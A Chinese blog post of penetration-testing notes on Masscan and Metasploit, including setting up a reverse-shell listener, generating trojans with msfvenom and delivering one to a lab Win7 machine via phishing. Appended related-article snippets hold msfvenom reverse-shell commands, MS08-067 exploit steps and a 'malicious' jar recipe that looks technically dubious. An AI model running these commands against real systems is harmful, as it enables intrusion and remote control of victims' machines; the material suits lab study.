内网渗透笔记——msf

原创 已于 2022-01-22 01:43:14 修改 · 4.9k 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #linux

于 2022-01-22 00:07:47 首次发布

Masscan

号称五分钟扫遍互联网


性能优越,极限速度 1000w/s,参数 跟 nmap 差不多

-p 80,8000-8100 10.0.0.0/24
--max-rate=100000    //发包的极限速度


masscan 0.0.0.0/0 -p 0-65535     //扫描整个互联网的所有端口

不要轻易尝试.......

Metasploit(msf)

一旦出现漏洞,出现利用漏洞的方法,则会马上收录——傻瓜式攻击

早期想要利用漏洞——需知道漏洞的poc和exp

poc:漏洞验证脚本(只会告诉你存在这个漏洞)

​ log4j:calc

exp:漏洞利用脚本(详细操作方法)

msf分为两大块


msfconsole(控制台)

msfvenom(木马生成平台,一键生成木马)

metasploit v6.1.4-dev                           ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion  

exploite:漏洞利用,配合payload

payload:成功exp后,攻击过程中执行的指令或代码,反弹shell,也可以是直接在目标系统中执行的指令

- singles:所有代码都在一个文件中(大木马),会受到内存空间的限制
- stagers:传输payload所建立的连接,安全的把我们的payload传输到目标运行(stages)
- stages:stagers建立连接后,在传输的代码(payload)

auxiliary:辅助模块,用于信息收集,没有payload的exp
encoders:编码模块,对payload进行加密,躲避杀毒的查杀

post:取得shell,进一步运行的攻击指令(后渗透)

nops:空指令,起到混淆的作用

evasion:免杀,效果非常好,但具有时限性,百分百免杀

msfdb(msf数据库,用于信息收集的存储)

msfdb init          初始化数据库

service postgresql start      启动数据库
msfdb run   自动启用连接数据库

db_status        查询是否连接数据库

hosts、services      查询扫描到的数据

db_nmap == nmap(但是nmap不会存入数据库)

connect 192.168.111.131 4444  类似nc的小工具(这里是正向连接)

注意:初始化数据库,启动数据库之后,要重启控制台(exit——msfconsole)

use exploit/multi/handler      监听模块

-info 

-show options     都是查看命令

常见payload连接方式
payload:
    bind        正向
    reverse        反向
    http        80
    https        443

payload设置方式:

set payload 操作系统/[架构/]终端/连接方式

 meterpreter      升级版shell

 LHOST ——本地ip        LPORT——端口

完成

run开始监听(或者exploit)

msfvenom

木马生成平台

-p            设置payload
-a            架构 x64 x86
      --platform    设置平台 windows/linux
-e            编码
-i            迭代
-f            文件格式
        -f raw -o 1.apk
        R -o 1.apk
-o            输出文件
    >
-l | --list            信息详细

注意!生成的payload 要和console设置的payload大致相同

比如你监听的是windows的木马,你生成的是linux的木马,很明显不合理


lhost=本机ip
rhost=目标ip

以上面设置的payload为例子,生成一个木马

好了,现在至关重要的问题来了,该怎么把木马放到受害者的靶机上呢?

最常用的方法——钓鱼


在当前文件夹快速开启http服务——搭建本地的一个网页
python2.7 -m SimpleHTTPServer 8080
python3.9 -m http.server 8080

靶机进入临时网站

注意一点,win7靶机要事先关闭防火墙,不然kali无法ping通win7

这里有奇怪的一点,输http://192.168.111.130:8080/可以访问,但是输192.168.111.130:8080无法访问,有点玄学。

 kali立刻就会显示访问网页的ip地址

kali开始监听

靶机下载木马并运行

 

kali获得反弹shell,成功!

shell

shell ctrl_z          shell放入后台

sessions             查看后台的连接

 sessions -u ID       shell 会话提升→meterpreter

meterpreter

meterpreter  bg          返回上层

信息收集
getuid
getsid

sysinfo
getsystem    一键提权,失败率较高,满试试

 run vnc  直接直播

以网页的方式查看    >    直播
screenshare

常用的后渗透信息收集

 

王嘴嘴
关注
exploit-db图文教程
xiongIT的博客
12-04 4366
ExploitDB 是一个面向全世界黑客的漏洞提交平台,该平台会公布最新漏洞的相关情况,这些可以帮助企业改善公司的安全状况,同时也以帮助安全研究者和渗透测试工程师更好的进行安全测试工作。Exploit-DB 提供一整套庞大的归档体系,其中涵盖了各类公开的攻击事件、漏洞报告、安全文章以及技术教程等资源。
渗透工具——kali中msf简介(以及MSF的基本使用方法)
2301_78006725的博客
09-02 9852
设置payload:set payload windows/x64/meterpreter/reverse_tcp。1. 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue。设置模块:use auxiliary/scanner/smb/smb_ms17_010。攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。设置目标地址:set RHOSTS [目标地址]
玩转Exploit-DB,从脚本小子到安全专家
最新发布
分享Python知识
09-22 1133
Exploit Database(Exploit-DB)是一个收集和维护了大量公开漏洞利用(Exploit)和概念验证(PoC)代码的数据库和网站。它由Offensive Security(OffSec)团队维护——是的,就是那个创办了顶级渗透测试认证OSCP的知名安全公司。Exploit-DB是一个标准化的漏洞利用代码归档系统,每个漏洞利用都有唯一的EDB-ID标识符,包含完整的元数据信息,如平台类型、漏洞分类、作者信息和发布日期。
msf相关讲解
热门推荐
weixin_46476861的博客
01-22 1万+
Metasploit就是一个安全漏洞检测工具。它的全称叫做The Metasploit Framework,简称MSFmsf专业术语: 1 渗透攻击(Exploit) 攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。 2 攻击载荷(Payload) 目标系统在被渗透攻击后而执行的代码。在MSF框架中可以自由的选择、传送和植入。 3 溢出代码(Shellcode) 渗透攻击时作为攻击载荷运行的一组机器指令。shellcode通常用汇编语言编写。 4 模块(Module) 在MSF
MSF内网渗透
cooper的笔记本
02-27 830
MSF内网渗透
MSF 内网渗透笔记
07-03 299
进入meterpreter模式 在meterpreter中输入shell即可进入CMD窗口接着即可执行CMD命令,例如打开RDP服务REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f meterpr...
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记
ierciyuan的博客
08-01 1万+
内网渗透实战攻打红日靶场第一关,包括环境配置、信息收集、漏洞利用、内网信息收集、内网攻击、横向移动等操作。
渗透测试笔记】之【内网渗透——横向移动:PsExec的使用
2401_85599090的博客
06-25 567
【代码】【渗透测试笔记】之【内网渗透——横向移动:PsExec的使用。
渗透测试笔记】之【内网渗透——Cobalt Strike会话管理(与MSF联动)】_cobalt 信回话
2401_84969426的博客
05-13 397
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
渗透测试笔记】之【内网渗透——Cobalt Strike会话管理(与MSF联动)】_cobalt 信回话(2)
2401_84969389的博客
05-13 417
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
内网渗透总结——红日靶场③
weixin_74545038的博客
11-30 1820
红日靶场三渗透总结
msf内网渗透
10-29
msf内网渗透
MSF多层内网渗透全过程
include_voidmain的博客
08-16 2449
MSF多层内网渗透全过程
内网渗透 Metasploit(MSF)基础使用
Innocence_0的博客
03-09 2358
msfvenom 是 msf 生成 payload 的一个工具这里要区分一下 EXP 与 Payload :EXP 是利用漏洞进行攻击动作,而 payload 是 EXP 执行成功后在目标内进行各种指令动作。除了可以将 payload 插入到 exp 里面,也可以作为独立模块进行生成,需要用这个工具生成一个落地化的,类似于会话,可移植性各种操作Armitage 就是一款使用 Java 为 Metasploit 编写的有图形化操作界面的软件,通过它可以轻松的使用 Metasploit 对目标进行攻击。
内网渗透 Metasploit(MSF)基础使用
xnxqwzy的博客
02-27 682
以下内容仅供学习使用,非法使用造成的问题由使用人承担。
内网渗透-如何利用msf把流量代理进内网-隧道搭建
weixin_42109829的博客
01-10 8148
0x01 前言 在攻防演练时,当我们拿下主机时,我们要开始对内网进行渗透,常见的手法有,frp,ew,等代理工具,这里我介绍一个工具 msf 模块中的socket 4a代理工具,这里我使用的是msf 5的版本,好像在使用msf 6的版本一直不成功的样子,所以你们做遇到代理不成功的情况下,可以尝试换个msf 5的版本进行尝试。 0x02 生成路由 msf操作 拓扑图如下 首先先生成一个elf 马进行上线 linux 生成木马上线文章—>linux主机生成木马攻击 run autoroute -s ip
[内网渗透]msfconsole提权
purvispanwu的博客
03-17 1429
1.环境准备 kali虚拟机 IP:192.168.112.66 靶机 win7 SP1 IP:192.168.112.145 2.生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.112.66 lport=4444 -f exe -o /tmp/purvis.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为192.168.112.66
什么是MSF
0_net的专栏
10-23 1594
        MSF(微软解决方案框架结构)是一组建立、开发和实现分布式企业系统应用的工作模型、开发准则和应用指南。它帮助企业融合商业和技术的目标,降低采用新技术后系统整体的费用,以及成功的应用微软技术整合商业过程的方法。   MSF揭示出为成功设计、构建和管理技术基础结构或商业解决方案,所需了解的重要风险、重要的设计基础假设和关键的依赖关系。它包括明确的知识库、应用指南和实践经验,如:
渗透测试笔记】之【MSF Exploit模块】
AA8j的博客
11-05 1267
Exploit Active exploit 主动连接,需要目标关闭防火墙。 win8利用smb漏洞演示: # 使用漏洞模块 msf5 > use exploit/windows/smb/psexec # 查看选项 msf5 exploit(windows/smb/psexec) > show options # 配置必要参数(目标主机地址,用户名密码等) msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.172.132 msf5
内网渗透msf
03-15
### 关于 Metasploit 框架在内网渗透中的应用 #### 什么是 Metasploit? Metasploit 是一种功能强大的开源渗透测试框架,广泛应用于网络安全评估和漏洞研究领域。该框架提供了丰富的模块化设计,支持多种类型的攻击向量以及后渗透阶段的操作工具[^1]。 #### 内网渗透的主要过程 内网渗透通常遵循标准化的渗透测试流程,具体分为以下几个部分: - **前期交互 (Pre-engagement Interactions)** 此阶段涉及与客户沟通以明确目标范围、时间安排以及其他约束条件等内容[^2]。 - **情报收集 (Intelligence Gathering)** 利用公开资源或技术手段搜集有关目标网络的信息,例如 IP 地址、开放端口和服务版本等数据。 - **威胁建模 (Thread Modelling)** 对所获得的情报进行分析处理,并识别潜在的安全风险点。 - **漏洞分析 (Vulnerability Analysis)** 运用扫描器或其他自动化工具检测系统中存在的弱点,同时验证其真实性。 - **渗透攻击 (Exploitation)** 配置合适的exploit模块针对发现的目标服务发起实际攻击尝试获取控制权^。 - **后渗透攻击 (Post Exploitation)** 成功入侵之后进一步探索内部环境寻找敏感资料或者横向移动至其他主机上继续扩展访问权限^。 - **报告撰写 (Reporting)** 将整个过程中遇到的问题汇总整理成文档形式提交给委托方作为改进依据^。 #### 使用案例:通过 MS08-067 漏洞实现远程代码执行 假设存在一台运行 Windows Server 2003 的服务器未修补 CVE-2008-4250(即著名的 MS08-067),可以按照如下方式利用 Metasploit 来完成对该机器的接管工作: ```bash use exploit/windows/smb/ms08_067_netapi set RHOSTS <target_ip> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <local_ip> set LPORT <listening_port> run ``` 上述命令序列依次完成了指定目标地址、选择有效载荷类型及其参数设置最后启动攻击动作的任务描述[^3]^。 另外,在某些特殊场景下如果目标环境中部署有 Java 应用程序,则还可以考虑采用基于 JVM 层面存在的缺陷来进行突破尝试。比如下面这个例子展示了如何创建一个带有隐藏功能的 JAR 文件用于分发传播恶意软件实例: ```java import java.io.*; public class Evil { public static void main(String[] args){ try{ Runtime.getRuntime().exec("cmd /c start calc.exe"); }catch(Exception e){} } } // Compile and package into a jar file. javac Evil.java && jar cvfe evil.jar Evil.class . ``` 接着再配合 `msfvenom` 工具生成自定义 payload 并嵌入到刚才准备好的载体当中去形成最终成品供后续投放使用[^4]^。 ```bash msfvenom -p generic/shell_reverse_tcp LHOST=<your_IP> LPORT=<port_number> -f raw > shellcode.bin cat shellcode.bin >> evil.jar zip -A evil.jar ``` 以上便是关于如何运用 Metasploit 开展内网渗透活动的一些基础知识和技术要点概述。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值